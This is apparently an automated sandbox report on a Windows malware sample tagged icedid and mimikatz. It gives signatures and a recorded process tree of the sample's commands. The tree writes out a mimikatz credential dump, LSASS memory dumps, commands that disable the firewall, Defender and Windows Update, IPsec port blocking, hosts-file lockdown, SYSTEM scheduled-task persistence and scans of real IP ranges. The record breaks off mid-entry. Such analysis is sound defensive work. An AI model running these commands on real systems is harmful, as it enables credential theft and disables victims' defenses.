Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2024 07:34

General

  • Target

    2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe

  • Size

    9.8MB

  • MD5

    91e69467e6449f40d3b16eaecb505043

  • SHA1

    c51cc29b2b524ff59d41e5a73a83951824cc49bb

  • SHA256

    ba8fe6b5c6d587b9c9e720a72ebfe2165f1eb9abc329c67f9503867ea86b7c9e

  • SHA512

    72aa66007729c58c872548fc71f3bda1350cbaa09d13331f96023660aaaf1da82334f07322393bf63175cc02845295e0ee606410b316801c5a5a0c69e75b20ed

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (20244) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2132
      • C:\Windows\TEMP\letltzgie\jtpawa.exe
        "C:\Windows\TEMP\letltzgie\jtpawa.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3980
    • C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fpibtvet\snutqkl.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1184
        • C:\Windows\fpibtvet\snutqkl.exe
          C:\Windows\fpibtvet\snutqkl.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4076
    • C:\Windows\fpibtvet\snutqkl.exe
      C:\Windows\fpibtvet\snutqkl.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3964
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4548
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:1804
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:976
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:60
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:3488
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4504
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static del all
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2044
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add policy name=Bastards description=FuckingBastards
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4640
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filteraction name=BastardsList action=block
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1264
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\mtemsclch\taatftcev\wpcap.exe /S
                  2⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3396
                  • C:\Windows\mtemsclch\taatftcev\wpcap.exe
                    C:\Windows\mtemsclch\taatftcev\wpcap.exe /S
                    3⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in System32 directory
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1540
                    • C:\Windows\SysWOW64\net.exe
                      net stop "Boundary Meter"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4332
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop "Boundary Meter"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:840
                    • C:\Windows\SysWOW64\net.exe
                      net stop "TrueSight Meter"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:532
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop "TrueSight Meter"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2324
                    • C:\Windows\SysWOW64\net.exe
                      net stop npf
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3128
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:3876
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1804
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:5028
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4504
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1180
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3212
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3928
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4212
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:388
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt
                  2⤵
                    PID:1552
                    • C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe
                      C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:556
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtemsclch\Corporate\log.txt
                    2⤵
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:2172
                    • C:\Windows\mtemsclch\Corporate\vfshost.exe
                      C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4392
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:748
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:5016
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4252
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"
                    2⤵
                      PID:1264
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                          PID:3312
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:3240
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"
                        2⤵
                          PID:3792
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3624
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            • Scheduled Task/Job: Scheduled Task
                            PID:3200
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1584
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1120
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2976
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static set policy name=Bastards assign=y
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:2992
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3336
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1996
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4608
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static set policy name=Bastards assign=y
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:3396
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:1180
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2236
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2028
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static set policy name=Bastards assign=y
                          2⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1568
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop SharedAccess
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4552
                          • C:\Windows\SysWOW64\net.exe
                            net stop SharedAccess
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4864
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SharedAccess
                              4⤵
                                PID:2052
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh firewall set opmode mode=disable
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4668
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh firewall set opmode mode=disable
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:4012
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh Advfirewall set allprofiles state off
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4772
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh Advfirewall set allprofiles state off
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:4576
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 784 C:\Windows\TEMP\mtemsclch\784.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2188
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop MpsSvc
                            2⤵
                              PID:1888
                              • C:\Windows\SysWOW64\net.exe
                                net stop MpsSvc
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3120
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop MpsSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1616
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop WinDefend
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4204
                              • C:\Windows\SysWOW64\net.exe
                                net stop WinDefend
                                3⤵
                                  PID:1120
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WinDefend
                                    4⤵
                                      PID:1128
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c net stop wuauserv
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1404
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1184
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4396
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1656
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config MpsSvc start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    PID:4188
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config SharedAccess start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2532
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config SharedAccess start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:4876
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config WinDefend start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:708
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2172
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2128
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config wuauserv start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:1848
                                • C:\Windows\TEMP\xohudmc.exe
                                  C:\Windows\TEMP\xohudmc.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2528
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 332 C:\Windows\TEMP\mtemsclch\332.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2544
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2132 C:\Windows\TEMP\mtemsclch\2132.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:768
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2596 C:\Windows\TEMP\mtemsclch\2596.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4856
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2748 C:\Windows\TEMP\mtemsclch\2748.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4360
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2836 C:\Windows\TEMP\mtemsclch\2836.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2436
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3144 C:\Windows\TEMP\mtemsclch\3144.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4620
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3816 C:\Windows\TEMP\mtemsclch\3816.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4460
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3904 C:\Windows\TEMP\mtemsclch\3904.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2456
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3972 C:\Windows\TEMP\mtemsclch\3972.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4556
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 4056 C:\Windows\TEMP\mtemsclch\4056.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5080
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3496 C:\Windows\TEMP\mtemsclch\3496.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3724
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 4036 C:\Windows\TEMP\mtemsclch\4036.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3620
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 216 C:\Windows\TEMP\mtemsclch\216.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3228
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 640 C:\Windows\TEMP\mtemsclch\640.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2844
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2584 C:\Windows\TEMP\mtemsclch\2584.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3284
                                • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                                  C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2412 C:\Windows\TEMP\mtemsclch\2412.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2052
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\mtemsclch\taatftcev\scan.bat
                                  2⤵
                                    PID:4708
                                    • C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe
                                      ngliteqrb.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:1628
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    2⤵
                                      PID:5752
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2380
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:6124
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                          PID:4428
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3260
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:180
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5256
                                    • C:\Windows\SysWOW64\nspfoo.exe
                                      C:\Windows\SysWOW64\nspfoo.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:4844
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\snutqkl.exe
                                      1⤵
                                        PID:3244
                                        • C:\Windows\ime\snutqkl.exe
                                          C:\Windows\ime\snutqkl.exe
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:512
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F
                                        1⤵
                                          PID:2496
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            2⤵
                                              PID:3200
                                            • C:\Windows\system32\cacls.exe
                                              cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F
                                              2⤵
                                                PID:996
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
                                              1⤵
                                                PID:436
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  2⤵
                                                    PID:2408
                                                  • C:\Windows\system32\cacls.exe
                                                    cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
                                                    2⤵
                                                      PID:3036
                                                  • C:\Windows\system32\cmd.EXE
